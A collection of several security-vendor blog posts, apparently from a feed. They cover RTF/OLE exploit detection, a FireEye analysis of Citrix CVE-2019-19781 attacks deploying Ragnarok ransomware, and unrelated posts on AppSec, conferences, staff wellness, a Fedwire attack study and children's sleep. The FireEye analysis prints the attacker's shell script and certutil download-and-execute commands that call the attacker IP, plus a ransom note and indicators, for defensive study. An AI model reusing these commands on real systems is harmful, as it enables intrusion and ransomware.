RTF documents can also embed other file types, like scripts (VBScript, JavaScript, etc.), XML files and executables, via OLE packages. An OLE package in an RTF file is indicated by the ProgID string "package" as the argument to the nested control word "objclass". The Packager format is a legacy format that does not have an associated OLE server. Looking at the associated CLSID in the registry, there is no specific data format mapped to Packages.

This essentially implies that OLE packages can store arbitrary file types and that, if a user clicks the object, it will be executed, eventually infecting the machine if the content is a malicious script. RTF documents have been known to deliver malware by embedding scripts via OLE packages and then using Monikers, as described in the previous sections, to drop files into the desired directory and execute them. One such instance of a malicious RTF document exploiting CVE-2018-0802 and embedding an executable file is shown below.

Since many RTF documents have been found delivering malware via OLE packages, it is critical to look for these embedded objects and analyse them for such additional payloads. Embedded executables or scripts within RTF could be malicious, and looking for OLE packages and extracting the embedded files is a straightforward task.
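
Flagging such packages can be as simple as looking for the "package" ProgID supplied to objclass; the following is a rough sketch of my own rather than part of any analysis framework discussed here:

import re
import sys

def find_ole_packages(rtf_bytes):
    """Return byte offsets of embedded objects whose ProgID is 'Package'."""
    return [m.start() for m in
            re.finditer(rb"\\objclass\s+package\b", rtf_bytes, re.IGNORECASE)]

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        data = f.read()
    offsets = find_ole_packages(data)
    if offsets:
        print(f"{len(offsets)} OLE Package object(s) found at offsets {offsets}")
        print("extract the matching objdata blobs and inspect the embedded files")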

The above exploit delivery strategies can allow us to take a step towards building analysis frameworks for RTF documents. Primarily, inspecting the linked or embedded objects turns out to be the critical aspect of automated analysis, along with inspection of the RTF control words. The following are the key takeaways:

  • Using the RTF file as the container, many other file format exploits can be embedded inside using the Object Linking and Embedding feature, essentially weaponizing the RTF documents.
  • Extracting and analysing embedded or linked objects for malicious code, payloads, or resource handler invocations is essential.
  • If an RTF document has a large volume of appended data, it must be examined further.
  • Non-OLE control words and OLE packages must also be analysed for any malicious content.

McAfee Response

As Microsoft Office vulnerabilities continue to surface, generic inspection methods will have to be improved and enhanced, consequently leading to better detection results. As a reminder, the McAfee Anti-Malware engine used on all our endpoints and most of our appliances has the potential to unpack Office, RTF and OLE documents, expose the streams of content and unpack these streams if necessary.

The post An Inside Look into Microsoft Rich Text Format and OLE Exploits appeared first on McAfee Blogs.

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or, most commonly, NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, an XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system
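
The exact encoding used by de.py is not reproduced here, but the general pattern it implements, decoding an XOR-obfuscated blob, writing out the resulting ZIP and extracting it, looks roughly like the sketch below; the single-byte key is an assumption for illustration only, and the file names follow those seen in ld.sh.

import zipfile

XOR_KEY = 0x41           # assumption for illustration; the real de.py key differs
IN_FILE = "piz.Lan"      # XOR-encoded blob downloaded by ld.sh
OUT_ZIP = ".new.zip"     # decoded archive, matching the file name removed by ld.sh

with open(IN_FILE, "rb") as f:
    decoded = bytes(b ^ XOR_KEY for b in f.read())

with open(OUT_ZIP, "wb") as f:
    f.write(decoded)

# unpack the decoded archive (x86.dll, x64.dll, scan.py and the replay files)
with zipfile.ZipFile(OUT_ZIP) as archive:
    archive.extractall("httpd")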

piz.Lan -> .new.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing ".new.zip" (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename | Functionality | MD5
x86.dll | 32-bit Downloader | 9aa67d856e584b4eefc4791d2634476a
x64.dll | 64-bit Downloader | 55b40e0068429fbbb16f2113d6842ed2
scan.py | Python socket scanner | b0acb27273563a5a2a5f71165606808c
xp_eternalblue.replay | Exploit replay file | 6cf1857e569432fcfc8e506c8b0db635
eternalblue.replay | Exploit replay file | 9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- or 64-bit, as well as raw shellcode to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bitness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique T1105 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll
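
For defenders, one generic way to hunt for this particular certutil abuse (a sketch of my own, separate from the FireEye detections listed later in this post) is to flag process command lines that combine -urlcache with -split -f and a URL, as in the strings above:

import re

# crude indicator of certutil being used as a downloader, as in Figures 5 and 6
CERTUTIL_DOWNLOAD = re.compile(
    r"certutil(\.exe)?\s+.*-urlcache\s+.*-split\s+-f\s+https?://",
    re.IGNORECASE,
)

def is_suspicious_cmdline(cmdline):
    return bool(CERTUTIL_DOWNLOAD.search(cmdline))

# toy example mirroring the command-line shape shown above (URL is a placeholder)
print(is_suspicious_cmdline(
    "certutil.exe -urlcache -split -f http://example.invalid/patch32 "
    "C:/Users/Public/since1969.exe"
))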

Although neither patch32 nor patch64 was available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 7). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated with 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified Ragnarok-related artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 9, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if you suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name
  • CERTUTIL.EXE DOWNLOADER (UTILITY)
  • CURL Downloading Shell Script
  • ETERNALBLUE EXPLOIT
  • METERPRETER (Backdoor)
  • METERPRETER URI (STAGER)
  • SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type | Indicator | Notes
Network | 45[.]120[.]53[.]214 |
Network | 198[.]44[.]227[.]126 |
Host | 91dd06f49b09a2242d4085703599b7a7 | piz.Lan
Host | 01af5ad23a282d0fd40597c1024307ca | de.py
Host | bd977d9d2b68dd9b12a3878edd192319 | ld.sh
Host | 0caf9be8fd7ba5b605b7a7b315ef17a0 | .new.zip
Host | 9aa67d856e584b4eefc4791d2634476a | x86.dll
Host | 55b40e0068429fbbb16f2113d6842ed2 | x64.dll
Host | b0acb27273563a5a2a5f71165606808c | scan.py
Host | 6cf1857e569432fcfc8e506c8b0db635 | xp_eternalblue.replay
Host | 9e408d947ceba27259e2a9a5c71a75a8 | eternalblue.replay
Host | e345c861058a18510e7c4bb616e3fd9f | avpass.exe
Host | 48452dd2506831d0b340e45b08799623 | since1969.exe
Email Address | asgardmaster5@protonmail[.]com | From ransom note
Email Address | ragnar0k@ctemplar[.]com | From ransom note
Email Address | j.jasonm@yandex[.]com | From ransom note

Table 3: Collection of IOCs from this blog post

Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding, backed by the Forrester Analytics Global Business Technographics® Security Survey, 2019, is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common breach vector, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing occasional prerelease scans. According to Veracode’s State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.

Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can be caught up in no time. Read the full Forrester report for details on the state of AppSec in government agencies.

RSA 2020 – See You There!

It’s that time of year again—security companies are starting to gear up for the RSA Conference in San Francisco’s Moscone Center. Known as one of the world’s largest security conferences, RSA attracts around 42,000 attendees, including 700 speakers, and hosts more than 550 sessions. This year, RSA organizers are adding a new element for attendees to enjoy called the “Engagement Zone,” a networking space designed to inspire attendees with an interactive, collaborative and cooperative learning space.

This year’s RSA Conference theme is the “Human Element.” With new technologies, strategies and AI being employed by both security pros and threat actors, one thing remains constant: us. We are the Human Element within cybersecurity. Here at McAfee, we couldn’t agree more. McAfee’s Senior Principal Engineer and Chief Data Scientist, Celeste Fralick, said, “While the possibilities with AI seem endless, the idea that they could eliminate the role of humans in cybersecurity departments is about as farfetched as the idea of a phalanx of Baymaxes replacing the country’s doctors.” According to Celeste, AI and humans have equally important roles in cybersecurity. “There are tasks that humans currently excel at that AI could potentially perform someday. But these tasks are ones that humans will always have a sizable edge in, or are things AI shouldn’t be trusted with.”

Whether you’re a seasoned veteran or a first-time attendee at RSA, you should sketch out a game plan of the sessions and booths you want to visit before making your way into the city.

Join McAfee at RSA 2020

CSA Summit Keynote: Case Study: Obvious and Not-So Obvious Lessons Learned On the Path to Cloud-First IT

Monday, February 24 | 1:00pm – 1:20pm| Moscone Center

Land O’ Lakes operates a global dairy and agriculture co-operative across 60 countries with thousands of distributed employees. The demands of global business once required highly complex applications running in their private data centers, but are now met with increased velocity and better security in the public cloud. How did they do it? Hear from Land O’ Lakes CISO Tony Taylor and McAfee SVP of Cloud Security Rajiv Gupta as they share lessons learned along the journey to cloud-first IT at Land O’ Lakes, including new requirements for cloud-native security controls and the evolution to a cloud-edge architecture that has replaced their former network.

Keynote: Time to Tell

Tuesday, February 25 |8:35am – 8:55am | RSA West Stage | Session Code: KEY-T03W

Cyber defenses from a generation ago linger front and center, even as quantum computing will reshape the digital world. Steve Grobman makes the case it’s time to move beyond intelligence.

Session: Inside the Takedown of the Rubella Macro Builder Suspect

Tuesday, February 25 | 1:00pm – 1:50pm | Moscone South | Session Code: PART1-T10

During this session, the McAfee Advanced Threat Research lead investigator will explain some of the details the team found that helped unmask the suspected actor behind the Rubella Macro Builder. These details were shared with law enforcement and proved to be crucial in its investigation.

Session: Emerging Threats: Deep Fakes are Getting Terrifyingly Real – How Can We Spot Them?

Monday, February 24 | 3:05pm – 3:35pm | Moscone West | Session Code: SEM-M03

This seminar will provide a full day of focus on emerging threats such as ransomware, targeted attacks, emerging IoT threats, and new aspects of social engineering and deep fake human manipulation. Sessions get inside the minds and motivations.

Session: Reproducibility: The Life and Risks of a Model

Tuesday, February 25 | 2:20pm – 3:10pm | Moscone West, Classroom: MLAI1-R09 | Session Code: MLAI1-R09

Analytics are becoming ubiquitous in the ever-increasing world of data. Often, those analytics are implemented without thorough consideration of the life and the risks of the model employed. This session will explore enabling reproducibility and repeatability in data science, the life cycle of a model, what is missing in typical models of today, and how to ensure the healthy and reliable life of a model.

See You Soon!

There’s a lot to look forward to at RSA 2020, so be sure to stop by booth #N-5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XS0UMCAFE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

 

The post RSA 2020 – See You There! appeared first on McAfee Blogs.

You Bring the Yoga Mat, McAfee Brings the Goats

Yogis are likely familiar with the term vinyasa, but have you heard of caprine vinyasa? Caprine vinyasa elevates your standard yoga practice to a whole new level – with goats!

At McAfee, we recognize how beneficial stepping away from our desk can be for both our bodies and minds. Taking time to recharge, reset, and care for our physical and mental health is critical to live our best lives at and away from the office.

To offer our team members a smile-inducing wellness opportunity to practice mindfulness, we brought goats to the office for a yoga session. Why goats? Because animal therapy is known to lower blood pressure, lower anxiety, and increase mental stimulation (this is also why you can bring your dog to the office on Fridays!).

During our goat yoga day, goats climbed on people, nuzzled up next to others, and played with each other across the yoga mats. It was nearly impossible to take anything too seriously or to leave without a smile.

“I never imagined I’d be doing yoga with my teammates, let alone with goats climbing on my back! For me, it says a lot about a company that cares enough about employees to offer time away from your desk to practice mindfulness in a unique way. I can’t say I’ll join the regular goat yogis, but it was great experience with my team!”– Jenna, People Analytics

Ready to join a company that cares about your wellbeing (and loves furry friends)? Search our openings.

The post You Bring the Yoga Mat, McAfee Brings the Goats appeared first on McAfee Blogs.

In for the weakness, in for the Hack

In my first week of the basic course in the Israeli army, I was taught that in terms of information security there is no piece of information too negligible or too small to deal with.

The base location, the unit’s name, how big my team is – none of these shall be told.
There is no need to brag about the amazing projects we do
and
There is no reason to connect external media to computers

EVERYTHING about information security is important and must never be an afterthought.

That approach is based on the assumption that a person who was educated from the very first moment not to disclose the name of the unit (barely even the city it is located in) will be very mindful and aware when handling information with real potential for harm.

This is an excellent and well-proven attitude with regard to security, and I’d expect it to be a cornerstone in mission-critical cybersecurity organizations and industries such as medical, energy, avionics and automotive.

You can imagine how surprised I was when I heard, too many times, from very senior executives in tone-setting companies:

“The distance between a weakness, a hack, and actually taking over a vehicle and putting people in jeopardy is very large. We shall not be excited by each vulnerability.”

Technically, to some extent, they are right. The transition from weakness to exploitation is significant and sometimes impossible. Not every weakness will end in a ransomware message on your airplane infotainment screen.

But this is exactly the kind of dismissive approach to security findings that we must not remain indifferent to.

After all, taking control of a Jeep Cherokee required a combination of weaknesses, exploitation methods, poorly protected communication, and more.

At the end of the day, each cyber incident begins with a weakness that was not well covered, published, or addressed – pile on top of that great motivation, high technical skill and tenacity, and you get an assault that will make you wanna cry.

As Lao Tzu said, ‘A journey of a thousand miles begins with a single step.’

In the cyber-security arena, a small buffer overflow can sometimes be that single step.

With cyber security we must go ‘All-In’ and leave nothing to luck. We must identify all the threats and evaluate the degree of exposure each one produces.

This knowledge provides us with options to tackle and resolve the issues – some as simple as using a different compilation method, some as complex as engaging the supply chain and development teams, and some that can be solved through operational mechanisms and processes.

I know that this ‘epiphany’ moment about the security status of your product usually causes more headaches than relief, since it usually brings a flood of new issues and gaps, and their treatment does not make it easier to meet the schedule or increase the margins.

It is much easier and more fun to hide under the warm blanket of blessed ignorance and practice looking surprised.

In my opinion, this is not a privilege we have in critical infrastructure, and specifically not in the current era of revolution. We strive for a shared, electronic and autonomous world – a cyber attack would stave off that revolution and deal a severe blow to the spirit of progress we all enjoy anticipating.

I know that the cyber security industry is aware of these needs; there are solutions (and I am sure they can get better) for doing just that: cyber risk assessment – mapping vulnerabilities, finding violations of security policies, compliance with the emerging ISO 21434, hardening issues, poorly performing encryption and even identifying the entire software stack. Risk assessment is conducted to avoid incidents, and the right measures should be devoted to doing just that – avoiding incidents, not responding to them.

To sum up, as I was told by the first sergeant while patrolling around the base, and as ‘Ivar the Boneless’ discovered in the last season of Vikings – a single uncovered crack and you may lose the fortress, lose the trust of the people and find yourself dining with the gods at Valhalla.

Therefore, don’t overlook your flaws and vulnerabilities – the progress starts there – you should accept yourself (and your not-so-perfect code) as you are and strive for improvement.

Guest blog written by Eddie Lazebnik, who brings 15 years of cyber experience in both the private and public sectors, and most recently at a groundbreaking startup. He served the Israeli government and military cybersecurity organizations for about a decade. He has an education in business administration, a proven technical execution record and a great passion for technology and innovation. He is very excited about the IoT revolution, specifically in the automotive industry – connected and autonomous vehicles. These days he leads strategy and strategic partnerships activity at Cybellum.

The post In for the weakness, in for the Hack appeared first on CyberDB.

Report: A Cyberattack Could Severely Disrupt the US Financial System

A new staff report from the Federal Reserve Bank of New York highlights the risk and potential fallout that a sophisticated cyberattack might have on the United States. In the report, analysts examined a scenario in which a single-day shock hits the country’s payment network, Fedwire, measuring the broad impact it would have on the economy. The results? A significant 38 percent of the network would be affected on average, with spillovers to other banks damaging the stability of the broader financial system in the United States.

How an attack might unfold

According to the analysts, this hypothetical situation would unfold swiftly. It begins with a cyberattack that allows financial institutions to continue receiving payments but prevents them from sending any payments throughout the operating day. In this scenario, because payments are actualized when Fedwire receives requests from senders, an institution’s balance in the system immediately reflects those changes, yet the targeted financial institution is unable to interact with Fedwire, causing a backup in the system. Essentially, impacted banks would become black holes that absorb liquidity without distributing any money.
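
To make the mechanics concrete, here is a deliberately tiny toy model (my own illustration, not the New York Fed’s methodology): three banks exchange payments over a day, one bank is hit and can receive but not send, and we check which banks end the day short of liquidity.

# Toy illustration of the "liquidity black hole" dynamic described above.
# payments[a][b] is the amount bank a would send to bank b over the day.
payments = {
    "A": {"B": 50, "C": 30},
    "B": {"A": 40, "C": 20},
    "C": {"A": 35, "B": 25},
}
reserves = {"A": 20, "B": 20, "C": 20}
impaired = "B"                     # the attacked bank: it receives but cannot send

end_balance = dict(reserves)
for sender, flows in payments.items():
    if sender == impaired:
        continue                   # its outgoing payments never happen
    for receiver, amount in flows.items():
        end_balance[sender] -= amount
        end_balance[receiver] += amount

short = [bank for bank, bal in end_balance.items() if bank != impaired and bal < 0]
print("end-of-day balances:", end_balance)
print("banks left short of liquidity:", short)

In this toy run the impaired bank ends the day hoarding liquidity while its counterparties go negative, which is the spillover effect the report measures at network scale.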

Timing matters too and can magnify the impacts of a breach. “Attacks on seasonal days associated with greater payment activity are more disruptive relative to non-seasonal days, with average impacts that are about 13 percent greater,” the report says. “We estimate that, on average, attacking on the worst date for a particular large institution adds an additional 25 percent in impairment relative to the case of no specific knowledge.”

The domino effect of liquidity hoarding

An important point to consider from this analysis is that the consequence of hoarding cash and forgoing payments during a breach can worsen the situation. The report explains, “We find that liquidity hoarding amplifies the network impact of the cyberattack, both increasing the average impact on the system and increasing the maximal risk.” As banks are not necessarily perceptive of daily liquidity conditions because they have ample reserves on hand, they likely will not react to these irregularities very quickly. Thus, all institutions other than the one impacted by a breach will continue to make payments as usual, resulting in substantial interruptions in the network.

It’s a domino effect that could shake up the whole system. Analysts uncovered a correlation of over 80 percent between assets and payments, finding that a smaller subset of banks plays a vital role in markets like equity and Treasury. A cyberattack on a single institution could impede the day-to-day functions of the payment network and cause quite a headache that extends beyond the impacted institutions, reaching into the economy.

Failing to respond to these issues strategically as they unfold can lead to that previously mentioned black hole of liquidity. This problem may be worsened if financial institutions use the same third-party service providers, which offers less incentive for banks to monitor activity and spot abnormalities that can cause liquidity interruptions.

Strengthening security for financial institutions

Considering the above scenario, data from our most recent State of Software Security report (SOSS) indicates that the financial industry has some work to do to shore up its application security. The figures reveal that, in the financial industry specifically, the median time to remediate security flaws in code (MedianTTR) is 67 days, which is higher than nearly every other industry we measured. Information leakage also has a high prevalence at 66 percent as opposed to 63 percent across all industries.

Our data uncovers best practices that are dramatically improving remediation times and reducing overall security debt. The analysis for this year’s report found that when organizations scan their applications for security more than 260 times per year, their median fix time drops from 68 days to 19 days, a 72% reduction.

Get more details on the application security trends and best practices in the full SOSS report.


Dangerous Digital Rituals: Could Your Child be Sleep Deprived?


You’re not wrong if you suspect your kids are spending far more time online than they admit. Where you may be in the dark, however, is that a lot of kids (maybe even yours) are scrolling at night instead of sleeping, a digital ritual that puts their physical and mental health at risk.

And, because sleep and behavior are so intertwined, one family member’s unwise tech habits can quickly spill over and affect the whole family.

Screens over ZZZs

That moody stew your daughter has been dishing up all day may or may not be standard teen angst. And the D in math your son brought home for the first time may have little to do with geometric proofs.

While it may not be the first thing that comes to a parent’s mind, sleep deprivation could be a source of a number of family challenges today.

According to a 2019 Common Sense Media study, 68 percent of teens take their devices to their rooms at bedtime, and one-third have the phone with them in bed. Over one-third of those kids, and more than one-fourth of parents, admit to waking up to look at their phone at least once a night (usually to check social media or respond to a notification).

What science says

Like water and air, sleep is something humans need to live. Sleep deprivation over time is a serious condition, especially for children. Medical studies continue to link poor sleep habits to anxiety, reduced cognitive development, obesity, immunity issues, absentmindedness, and impaired judgment. Because sleep deprivation slows the brain’s reaction time, it is also one of the main causes of road accidents.

How much sleep do they need? The American Academy of Pediatrics recommendations:

  • Children 3-5 should sleep 10 to 13 hours on a regular basis
  • Children 6-12 should sleep 9 to 12 hours on a regular basis
  • Children 13-18 should sleep 8 to 10 hours on a regular basis

Goal: digital responsibility

I recently met a mom in a parenting forum who tackled this very issue by establishing clear ground rules for nighttime device use.

Dana Ahern is the mom of four (ages 7-15) and co-founder (along with husband Adam) of Village Social, a private, safe, “alternative” social network that helps teach kids digital responsibility.

Ahern says establishing ground rules for devices only works if parents stick to them.

“Yes, they [kids] might get mad,” says Ahern. “Yes, they may say they need their phone to listen to music or a meditation app to be able to fall asleep or need the alarm to wake up in the morning. Our solution — get them an Echo Dot or an old fashioned alarm clock radio in place of the phone.”

In the Ahern home, all screens must be shut off at least one hour before bedtime and put on a docking station in the parents’ bedroom. Screen time is tracked via the Downtime feature in Apple’s Screen Time. And all homework must be done in the living room (no bedrooms) with an absolute cut-off time of 10 p.m.

Says Ahern, “We’ve found that it’s been relatively easy to get all the kids on this schedule. They don’t fight it. They may, in fact, secretly appreciate knowing we care.”

More ideas to consider:

It’s never “too late” for a good change. Some parents say they’re reluctant to give their kids (especially teens) new technology rules because it’s “too late,” and their kids are too attached to their devices. Even so, with more information linking technology to kids’ mental health, it’s imperative to change course if needed — even if doing so may be difficult.

Reframe the change. Why are kids on their phones all night? Because they want to be and want often overpowers need in this age group. To help kids make tough digital shifts, discuss the personal gains that will result from the change. For instance, consistent quality sleep can help control weight, boost academic and athletic performance, increase energy and immunity levels, reduce drama and conflict, sharpen decision-making, and improve creativity and motivation. In short, quality sleep ignites our superpowers.

Add monitoring muscle. There are a number of ways to help keep a child’s screen time on track. One way is to get a monitoring solution. Need to make sure your youngest is only accessing the internet for homework at night? Or limit online game time to 30 minutes a day? Software support could help.

Model good sleep habits. Your kids will be the first ones to call you out if your screen time goes up while they are digitally wasting away. In the same Common Sense Media study, 39 percent of teens said their parents spent too much time on their phones in 2019 (an 11-point jump from 2016).

Any change to your child’s favorite rituals may put a temporary strain on the family dynamic. That’s okay. A little healthy tension, some grumbling, and lingering awkwardness are all side effects of successful digital parenting. Also, remind yourself and your kids as often as you need to that restricting device use — especially at bedtime — isn’t a punishment. It’s a health and safety choice that isn’t negotiable. Translation? Limits equal love.

The post Dangerous Digital Rituals: Could Your Child be Sleep Deprived? appeared first on McAfee Blogs.

CurveBall – An Unimaginative Pun but a Devastating Bug

Enterprise customers looking for information on defending against Curveball can find information here.

2020 came in with a bang, and it wasn’t from the record-setting number of fireworks on display around the world to celebrate the new year. Instead, just over two weeks into the decade, the security world was rocked by a fix for CVE-2020-0601 introduced in Microsoft’s first patch Tuesday of the year. The bug was submitted to Microsoft by the National Security Agency (NSA), and though initially deemed only “important”, it didn’t take long for everyone to figure out that this bug fundamentally undermines the entire concept of trust that we rely on to secure web sites and validate files.

The vulnerability centers on ECC (Elliptic Curve Cryptography), which is a very common method of digitally signing certificates, including both those embedded in files as well as those used to secure web pages. ECC is a mathematical combination of values that produce a public and private key for trusted exchange of information. Ignoring the intimate details for now, ECC allows us to validate that files we open or web pages we visit have been signed by a well-known and trusted authority. If that trust is broken, malicious actors can “fake” signed files and web sites and make them look to the average person as if they were still trusted or legitimately signed.

The flaw lies in the Microsoft library crypt32.dll, which has two vulnerable functions. The bug is straightforward in that these functions validate only the public key value, and NOT the parameters of the ECC curve itself. What this means is that if an attacker can find the right mathematical combination of private key and corresponding curve, they can generate the identical public key value as the trusted certificate authority, whoever that is. And since this is the only value checked by the vulnerable functions, the “malicious” or invalid parameters will be ignored, and the certificate will pass the trust check.

As soon as we caught wind of the flaw, McAfee’s Advanced Threat Research team set out to create a working proof-of-concept (PoC) that would allow us to trigger the bug, and ultimately create protections across a wide range of our products to secure our customers. We were able to accomplish this in a matter of hours, and within a day or two there were the first signs of public PoCs as the vulnerability became better understood and researchers discovered the relative ease of exploitation.

Let’s pause for a moment to celebrate the fact that (conspiracy theories aside) government and private sector came together to report, patch and publicly disclose a vulnerability before it was exploited in the wild. We also want to call out Microsoft’s Active Protections Program, which provided some basic details on the vulnerability allowing cyber security practitioners to get a bit of a head start on analysis.

The following provides some basic technical detail and timeline of the work we did to analyze, reverse engineer and develop working exploits for the bug.  This blog focuses primarily on the research efforts behind file signing certificates.  For a more in-depth analysis of the web vector, please see this post.

Creating the proof-of-concept

The starting point for simulating an attack was to have a clear understanding of where the problem was. An attacker could forge an ECC root certificate with the same public key as a Microsoft ECC Root CA, such as the ECC Product Root Certificate Authority 2018, but with different “parameters”, and it would still be recognized as a trusted Microsoft CA. The API would use the public key to identify the certificate but fail to verify that the parameters provided matched the ones that should go with the trusted public key.

There have been many instances of cryptographic attacks that leveraged an API’s failure to validate parameters (such as these two), with attackers exploiting exactly this type of vulnerability. Hearing about invalid parameters should raise a red flag immediately.

